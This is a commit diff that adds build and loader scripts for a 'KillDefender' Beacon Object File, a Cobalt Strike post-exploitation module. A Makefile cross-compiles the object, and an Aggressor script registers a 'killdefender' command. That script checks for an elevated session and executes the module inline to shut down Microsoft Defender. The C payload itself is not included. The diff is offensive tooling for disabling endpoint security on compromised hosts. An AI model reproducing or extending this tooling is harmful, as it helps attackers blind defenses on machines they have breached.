added some useful code

KillDefender.h

@@ -1,7 +1,7 @@
 #pragma once
 
 #include <windows.h>
-#include <TlHelp32.h>
+#include <tlhelp32.h>
 
 #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
 #define STATUS_SUCCESS 0x00000000

Makefile

@@ -0,0 +1,24 @@
+#
+# Beacon Object File ( BOF ) Compiler
+# 
+# Used to create object files that are
+# compatible with Beacon's inline-execute
+# command.
+#
+
+BOFNAME := killdefender
+CC_x64 := x86_64-w64-mingw32-gcc
+LD_x64 := x86_64-w64-mingw32-ld
+STRx64 := x86_64-w64-mingw32-strip
+CC_x86 := i686-w64-mingw32-gcc
+LD_x86 := i686-w64-mingw32-ld
+STRx86 := i686-w64-mingw32-strip
+
+
+all:
+	$(CC_x64) -o $(BOFNAME).x64.o -c KillDefender.c -masm=intel -Wno-multichar
+	$(CC_x86) -o $(BOFNAME).x86.o -c KillDefender.c -masm=intel -Wno-multichar
+
+clean:
+	rm -rf $(BOFNAME).x64.o $(BOFNAME).x86.o
+	rm -rf *.o

killdefender.cna

@@ -0,0 +1,39 @@
+beacon_command_register("killdefender", "kill defender", "Example: killdefender");
+
+alias killdefender {
+	$barch = barch($1);
+	# read in the BOF file
+    $handle = openf(script_resource("killdefender" . $barch . ".o"));
+    $data = readb($handle, -1);
+    closef($handle);
+
+    # you didn't compile BOF :(
+    if(strlen($data) == 0)
+    {
+        berror($1, "could not read bof file");
+        return;
+    }
+
+    if ((-isadmin $1)) 
+    {
+    	# announce what we're doing
+		btask($1, "Hold on to your butts! Killing Defender!");
+
+    	if (-is64 $1)
+    	{
+    		# spawn a Beacon post-ex job with the exploit DLL
+			beacon_inline_execute($1, $data, "go", $null);
+    	}
+    	else
+    	{
+    		# spawn a Beacon post-ex job with the exploit DLL
+			beacon_inline_execute($1, $data, "go", $null);
+    	}
+
+    } else
+    {
+        berror($1, "We require an elevated session (admin)");
+    }
+
+
+}